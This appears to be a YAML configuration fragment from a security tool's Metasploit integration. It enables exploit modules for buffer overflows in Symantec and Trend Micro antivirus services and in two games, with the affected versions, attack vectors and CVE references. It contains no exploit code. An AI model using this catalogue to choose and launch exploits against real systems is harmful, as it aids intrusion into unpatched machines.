- "22639"
path: extensions/metasploit/
class: Msf_module
msf_symantec_rtvscan:
enable: true
msf: true
msf_key: windows/antivirus/symantec_rtvscan
name: Symantec Remote Management Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantec Client Security 3.0.x.\n\
\t\t\t\tThis module has only been tested against Symantec Client Security 3.0.2\n\
\t\t\t\tbuild 10.0.2.2000.\n\
\t\t\t"
authors:
- - CVE
- 2006-2630
- - OSVDB
- "25846"
- - BID
- "18107"
- - URL
- http://research.eeye.com/html/advisories/published/AD20060612.html
path: extensions/metasploit/
class: Msf_module
msf_symantec_iao:
enable: true
msf: true
msf_key: windows/antivirus/symantec_iao
name: Symantec Alert Management System Intel Alert Originator Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Intel Alert Originator Service msgsys.exe.\n\
\t\t\t\tWhen an attacker sends a specially crafted alert, arbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2009-1430
- - OSVDB
- "54159"
- - BID
- "34674"
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_serverprotect_createbinding:
enable: true
msf: true
msf_key: windows/antivirus/trendmicro_serverprotect_createbinding
name: Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060.\n\
\t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2508
- - OSVDB
- "35790"
- - BID
- "23868"
path: extensions/metasploit/
class: Msf_module
msf_trendmicro_serverprotect_earthagent:
enable: true
msf: true
msf_key: windows/antivirus/trendmicro_serverprotect_earthagent
name: Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Trend Micro ServerProtect 5.58 Build 1060\n\
\t\t\t\tEarthAgent.EXE. By sending a specially crafted RPC request, an attacker could overflow the\n\
\t\t\t\tbuffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-2508
- - OSVDB
- "35789"
- - BID
- "23866"
path: extensions/metasploit/
class: Msf_module
msf_racer_503beta5:
enable: true
msf: true
msf_key: windows/games/racer_503beta5
name: Racer v0.5.3 beta 5 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module explots the Racer Car and Racing Simulator game\n\
\t\t\t\tversions v0.5.3 beta 5 and earlier. Both the client and server listen\n\
\t\t\t\ton UDP port 26000. By sending an overly long buffer we are able to\n\
\t\t\t\texecute arbitrary code remotely.\n\
\t\t\t"
authors:
- - CVE
- 2007-4370
- - OSVDB
- "39601"
- - URL
- http://www.milw0rm.com/exploits/4283
- - BID
- "25297"
path: extensions/metasploit/
class: Msf_module
msf_mohaa_getinfo:
enable: true
msf: true
msf_key: windows/games/mohaa_getinfo
name: Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack based buffer overflow in the getinfo\n\
\t\t\t\tcommand of Medal Of Honor Allied Assault.\n\
\t\t\t"
authors:
- - CVE
- 2004-0735
- - OSVDB
- "8061"
- - URL
- http://www.milw0rm.com/exploits/357
- - BID
- "10743"
path: extensions/metasploit/
class: Msf_module
Reference in New Issue View Git Blame Copy Permalink